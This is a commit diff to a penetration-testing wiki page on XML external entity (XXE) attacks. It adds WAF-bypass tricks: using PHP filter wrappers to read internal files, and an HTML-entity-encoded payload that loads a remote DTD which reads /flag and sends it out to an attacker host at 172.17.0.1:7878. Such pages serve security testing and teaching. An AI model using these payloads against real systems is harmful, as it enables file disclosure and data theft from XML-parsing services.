GitBook: [master] one page modified

pentesting-web/xxe-xee-xml-external-entity.md

@@ -465,7 +465,7 @@ Content-Type: application/xml;charset=UTF-8
 
 Another example can be found [here](https://medium.com/hmif-itb/googlectf-2019-web-bnv-writeup-nicholas-rianto-putra-medium-b8e2d86d78b2).
 
-## Other bypasses
+## WAF & Protections Bypasses
 
 ### Base64
 
@@ -491,6 +491,33 @@ You can use the \[**"Encode Recipe**" of cyberchef here \]\([https://gchq.github
 +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
 ```
 
+### File:/ Protocol Bypass
+
+If the web is using PHP, instead of using `file:/` you can use **php wrappers**`php://filter/convert.base64-encode/resource=` to **access internal files**.
+
+If the web is using Java you may check the [**jar: protocol**](xxe-xee-xml-external-entity.md#jar-protocol).
+
+### HTML entities
+
+Trick from [https://github.com/Ambrotd/XXE-Notes](https://github.com/Ambrotd/XXE-Notes)  
+You can create an **entity inside an entity** encoding it with **html entities** and then call it to **load a dtd**.
+
+```markup
+<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x20;&#x25;&#x20;&#x64;&#x74;&#x64;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x20;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x20;&#x3E;" >%a;%dtd;]>
+<data>
+    <env>&exfil;</env>
+</data>
+```
+
+DTD example:
+
+```markup
+<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/flag">
+<!ENTITY % abt "<!ENTITY exfil SYSTEM 'http://172.17.0.1:7878/bypass.xml?%data;'>">
+%abt;
+%exfil;
+```
+
 ## PHP Wrappers
 
 ### Base64